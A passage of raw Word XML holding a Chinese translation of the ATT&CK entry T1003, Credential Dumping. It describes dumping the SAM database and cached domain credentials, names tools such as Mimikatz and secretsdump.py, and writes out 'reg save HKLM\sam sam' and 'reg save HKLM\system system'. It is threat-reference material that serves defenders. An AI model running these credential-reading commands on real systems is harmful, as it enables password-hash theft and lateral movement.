          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>cat ~/.bash_history</w:t>
      </w:r>
      <w:r w:rsidRPr="00586424">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>这样的命令来访问此历史记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2168C86A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7D2D2F" w14:textId="3701F5FA" w:rsidR="000F2665" w:rsidRPr="0096095B" w:rsidRDefault="006508E9" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>凭据转储</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="5C845F6D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3B40FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1003</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F38E660" w14:textId="6D75D921" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EAE11D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CB19A2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r>
              <w:t>权限：管理员，系统，</w:t>
            </w:r>
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17A33EAF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r>
              <w:t>，进程监控，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r>
              <w:t>owerShell</w:t>
            </w:r>
            <w:r>
              <w:t>日志，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA88987" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId121" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="002C012A">
                <w:t>CAPEC-567</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="18B0E499" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Vincent Le Toux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>Ed Williams</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Trustwave</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>SpiderLabs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553E926E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D4DADCA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08110C62" w14:textId="490B3ABF" w:rsidR="000F2665" w:rsidRDefault="006508E9" w:rsidP="000F2665">
      <w:r>
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是从操作系统和软件获取</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录名和密码</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希或明文密码</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息的过程。然后可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行横向移动并访问受限制的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1114B198" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者和专业安全测试人员都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用此技术中提到的几种工具。也可能存在其他自定义工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EDCB37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00B331A9">
        <w:lastRenderedPageBreak/>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A99E341" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
      <w:r>
        <w:t>账户管理器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00B331A9">
        <w:t>SAM</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0327D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个数据库文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。该文件包含</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机的本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号（</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常是用“</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> net user</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”命令找到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号）</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。要枚举</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库，需要系统级别的访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可使用多种工具通过内存技术来检索</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DEB9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>pwdumpx.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75947F6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>gsecdump</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CE9B544" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CDBD9EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>secretsdump.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69444C56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reg</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从注册表中提取</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C316704" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg save HKLM\sam sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E49F440" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg save HKLM\system system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462BEF07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0092052E" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Creddump7</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地处理</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索哈希。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DA6BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0092052E" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rid 500</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是本地内置管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Rid501</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访客账号</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RID</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1,000+</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571F679" w14:textId="09D62C39" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1009760C" w14:textId="1E161899" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和更高版本使用的域缓存</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCC2</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）哈希在域控制器不可用时缓存</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认缓存</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数量各不相同，此数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中都可能变化</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此哈希不允许</w:t>
      </w:r>
      <w:r>
        <w:t>Pass the Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。可以使用多种工具通过内存技术来检索</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56026806" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="002D5E77">
        <w:t>pwdumpx.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355D9AD4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>gsecdump</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63097907" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId125" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D74DC5A" w14:textId="19DA5066" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="002D5E77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者，可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reg.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从注册表中提取文件，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Creddump7</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07366E99" w14:textId="44D652F5" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00426915">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Vista</w:t>
      </w:r>
      <w:r w:rsidRPr="0092052E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的缓存</w:t>
      </w:r>
